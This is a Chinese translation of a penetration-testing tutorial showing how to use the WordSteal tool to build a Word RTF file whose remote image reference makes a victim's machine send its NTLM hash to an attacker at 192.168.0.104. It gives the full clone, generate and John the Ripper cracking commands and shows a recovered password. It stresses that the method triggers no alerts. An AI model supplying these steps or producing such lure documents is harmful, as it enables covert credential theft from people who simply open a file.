Microsoft Word允许包含远程位置的图像。这是一个没有明确说明的功能,但被恶意软件创建者用来通过http来统计数据。我们还可以将远程文件包含到SMB服务器中,这在Pentest中非常有用,因为这样允许您窃取凭据而不触发任何警报,并且大多数安全应用程序都不会检测到这一点

攻击者:Kali Linux

目标:Windows 10( Microsoft Word 2007 )

LET’s Broach!!!

首先,我们需要从Github下载工具,在Kali Linux中打开终端并输入以下命令。

Git clone https://github.com/0x090x0/WordSteal.git

1

现在打开下载的文件夹word steal,你将看到一个python脚本“ main.py ”然后给main.py脚本所有权限。

Chmod 777 main.py

该脚本将会把jpg文件转换成rtf文件(Microsoft Word文件)

然后下载 图像并将其保存在Wordsteal文件夹中,我现在有一个图像“ 1.jpg ”,我们需要键入以下命令,它可以生成一个能从远程计算机窃取NTML hash的.rtf文件。

Python main.py 192.168.0.104 1.jpg 1

2

以上命令将生成.rtf文件,您可以在屏幕截图中看到这一点,然后将 1.rtf文件发送到远程PC。

3

当受害者在他的系统中打开1.rtf(作为Microsoft Word文件)时,攻击者会收到NTML哈希值。

4

在 word steal文件夹中我们可以看到我们已经成功窃取到了登录凭据,而不会触发任何警报

5

现在使用密码破解工具john ripper破解在password_netntlmv2文件中的哈希或键入以下命令

John password_netntlmv2

Cool!!!我们可以清楚地看到受害者的证书RAJ:123,这可能会进一步用于登录。

6

 

*来源:hackingarticles,MottoIN小编编译发布,

源链接

Hacking more

...